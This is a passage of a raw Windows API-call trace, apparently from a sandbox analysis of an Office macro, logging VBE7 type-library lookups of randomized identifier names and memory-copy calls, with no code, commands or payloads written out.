0x4 [0069.838] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.838] IUnknown:Release (This=0x665ba50) returned 0xd [0069.838] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87181e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_rAUQoA") returned 14 [0069.838] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_rAUQoA", lHashVal=0x101b9c, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x72005f00720061, ppTypeComp=0x6f005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x72005f00720061, ppTypeComp=0x6f005100000000, pDummy=0x0) returned 0x0 [0069.838] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b82392 | out: _Dst=0x144ec0) returned 0x0 [0069.838] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.838] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.838] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.838] IUnknown:Release (This=0x665ba50) returned 0xd [0069.838] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.838] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.838] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.838] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.838] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.838] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.839] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.839] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.839] IUnknown:Release (This=0x665ba50) returned 0xd [0069.839] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.839] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.839] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.839] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.839] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.839] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.839] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.839] IUnknown:Release (This=0x665ba50) returned 0xd [0069.839] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.839] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.839] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.839] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.839] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.839] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.839] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.839] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.839] IUnknown:Release (This=0x665ba50) returned 0xd [0069.839] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.839] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.839] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.840] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.840] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.840] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.840] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.840] IUnknown:Release (This=0x665ba50) returned 0xd [0069.840] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.840] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.840] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.840] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.840] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.840] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.840] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.840] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.840] IUnknown:Release (This=0x665ba50) returned 0xd [0069.840] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.840] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.840] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.840] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.840] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.840] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.840] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.840] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.840] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.841] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.841] IUnknown:Release (This=0x665ba50) returned 0xd [0069.841] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.841] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.841] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.841] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.841] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.841] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.841] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.841] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.841] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.841] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.841] IUnknown:Release (This=0x665ba50) returned 0xd [0069.841] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.841] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.841] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b822ea, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="JD4AkDU1") returned 9 [0069.841] ITypeComp:RemoteBind (in: This=0x665ba60, szName="JD4AkDU1", lHashVal=0x10e6f4, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b822ea, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="JD4AkDU1") returned 9 [0069.841] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="JD4AkDU1", lHashVal=0x10e6f4, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b822ea, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="JD4AkDU1") returned 9 [0069.842] ITypeComp:RemoteBind (in: This=0x665bd30, szName="JD4AkDU1", lHashVal=0x10e6f4, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.842] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="JD4AkDU1") returned 0x10e6f4 [0069.842] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="JD4AkDU1" | out: _Dst="JD4AkDU1") returned 0x0 [0069.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="JD4AkDU1") returned 9 [0069.842] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.842] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="JD4AkDU1", lHashVal=0x10e6f4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.842] IUnknown:Release (This=0x665ba50) returned 0xd [0069.842] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.842] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="JD4AkDU1", lHashVal=0x10e6f4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.842] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.842] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.842] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="JD4AkDU1", lHashVal=0x10e6f4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.842] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.842] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.842] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="JD4AkDU1", lHashVal=0x10e6f4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.842] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b822ea, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="JD4AkDU1") returned 9 [0069.842] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="JD4AkDU1", lHashVal=0x10e6f4, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.842] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.842] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b822ea | out: _Dst=0x67c2d40) returned 0x0 [0069.842] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_JD4AkDU1") returned 0x10aefc [0069.842] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_JD4AkDU1" | out: _Dst="_B_var_JD4AkDU1") returned 0x0 [0069.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_JD4AkDU1") returned 16 [0069.842] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.842] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_JD4AkDU1", lHashVal=0x10aefc, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.842] IUnknown:Release (This=0x665ba50) returned 0xd [0069.843] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.843] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_JD4AkDU1", lHashVal=0x10aefc, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.843] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.843] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.843] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_JD4AkDU1", lHashVal=0x10aefc, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.843] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.843] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.843] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_JD4AkDU1", lHashVal=0x10aefc, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.843] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.843] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.843] IUnknown:Release (This=0x665ba50) returned 0xd [0069.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87184e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_JD4AkDU1") returned 16 [0069.843] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_JD4AkDU1", lHashVal=0x10aefc, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4a005f00720061, ppTypeComp=0x6b004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4a005f00720061, ppTypeComp=0x6b004100000000, pDummy=0x0) returned 0x0 [0069.843] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b822ea | out: _Dst=0x144ec0) returned 0x0 [0069.843] ITypeComp:RemoteBind (in: This=0x665ba60, szName="EBxDwBBk", lHashVal=0x10bbbf, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b823e2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="EBxDwBBk") returned 9 [0069.843] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="EBxDwBBk", lHashVal=0x10bbbf, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b823e2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="EBxDwBBk") returned 9 [0069.843] ITypeComp:RemoteBind (in: This=0x665bd30, szName="EBxDwBBk", lHashVal=0x10bbbf, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.844] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EBxDwBBk") returned 0x10bbbf [0069.844] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="EBxDwBBk" | out: _Dst="EBxDwBBk") returned 0x0 [0069.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="EBxDwBBk") returned 9 [0069.844] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.844] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="EBxDwBBk", lHashVal=0x10bbbf, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.844] IUnknown:Release (This=0x665ba50) returned 0xd [0069.844] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.844] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="EBxDwBBk", lHashVal=0x10bbbf, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.844] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.844] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.844] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="EBxDwBBk", lHashVal=0x10bbbf, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.844] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.844] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.844] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="EBxDwBBk", lHashVal=0x10bbbf, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.844] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.844] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b823e2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="EBxDwBBk") returned 9 [0069.844] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="EBxDwBBk", lHashVal=0x10bbbf, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.844] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x68767a0 [0069.844] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b823e2 | out: _Dst=0x68767a0) returned 0x0 [0069.844] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_EBxDwBBk") returned 0x109348 [0069.844] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="UQ1DBGxA", cchCount1=-1, lpString2="_B_var_EBxDwBBk", cchCount2=-1) returned 3 [0069.845] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_EBxDwBBk" | out: _Dst="_B_var_EBxDwBBk") 